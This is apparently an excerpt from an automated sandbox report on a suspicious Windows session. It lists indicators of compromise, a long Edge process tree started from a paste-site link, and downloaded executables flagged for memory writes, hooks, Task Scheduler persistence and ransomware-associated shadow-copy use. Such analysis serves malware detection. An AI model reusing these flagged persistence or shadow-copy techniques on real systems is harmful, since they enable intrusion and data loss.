Token: 33	4192	litedb.exe
Token: SeIncBasePriorityPrivilege	4192	litedb.exe
Token: SeDebugPrivilege	4192	litedb.exe
Token: 33	4192	litedb.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe

Suspicious use of SendNotifyMessage 56 IoCs

Processes:

msedge.exe

pid	process
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe

Suspicious use of SetWindowsHookEx 27 IoCs

Processes:

7z2408-x64.exeSaveSoft.exeRuntime Explorer.exelitedb.exesvg.exeUMT.exelitedb.exe

pid	process
5192	7z2408-x64.exe
5928	SaveSoft.exe
2016	Runtime Explorer.exe
5928	SaveSoft.exe
4192	litedb.exe
4192	litedb.exe
4192	litedb.exe
4192	litedb.exe
4192	litedb.exe
4192	litedb.exe
4192	litedb.exe
4192	litedb.exe
4192	litedb.exe
4192	litedb.exe
4192	litedb.exe
4192	litedb.exe
4288	svg.exe
12908	UMT.exe
12908	UMT.exe
12908	UMT.exe
12908	UMT.exe
3984	litedb.exe
3984	litedb.exe
3984	litedb.exe
3984	litedb.exe
3984	litedb.exe
3984	litedb.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 2544 wrote to memory of 656	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 656	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2088	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2184	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 2184	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe
PID 2544 wrote to memory of 1684	2544	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://paste.fo/9253e43132b4
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc09a746f8,0x7ffc09a74708,0x7ffc09a74718
  2⤵
  PID:656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
  2⤵
  PID:2088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
  2⤵
  PID:1684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
  2⤵
  PID:2404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
  2⤵
  PID:636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
  2⤵
  PID:1828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
  2⤵
  PID:4544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
  2⤵
  PID:3320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
  2⤵
  PID:880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
  2⤵
  PID:932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
  2⤵
  PID:3792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6896 /prefetch:8
  2⤵
  PID:4376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
  2⤵
  PID:552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7512 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7596 /prefetch:8
  2⤵
  PID:3324
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7728 /prefetch:8
  2⤵
  PID:3396
- C:\Users\Admin\Downloads\7z2408-x64.exe
  "C:\Users\Admin\Downloads\7z2408-x64.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:5192
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7728 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5376
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:5564
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x288,0x28c,0x290,0x264,0x294,0x7ff68c265460,0x7ff68c265470,0x7ff68c265480
    3⤵
    PID:5620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:1
  2⤵
  PID:5180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:3952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6764 /prefetch:1
  2⤵
  PID:5548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6784 /prefetch:1
  2⤵
  PID:5704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
  2⤵
  PID:2620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6840 /prefetch:1
  2⤵
  PID:1180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6968 /prefetch:1
  2⤵
  PID:5356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:1
  2⤵
  PID:4488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
  2⤵
  PID:6108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7216 /prefetch:1
  2⤵
  PID:5724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7308 /prefetch:1
  2⤵
  PID:5756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4492 /prefetch:1
  2⤵
  PID:5304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
  2⤵
  PID:5196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:1
  2⤵
  PID:6020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7640 /prefetch:1
  2⤵
  PID:1180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6672 /prefetch:1
  2⤵
  PID:1016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
  2⤵
  PID:5776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
  2⤵
  PID:1956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2932 /prefetch:1
  2⤵
  PID:2784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6804 /prefetch:1
  2⤵
  PID:5916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5432 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4500 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:8
  2⤵
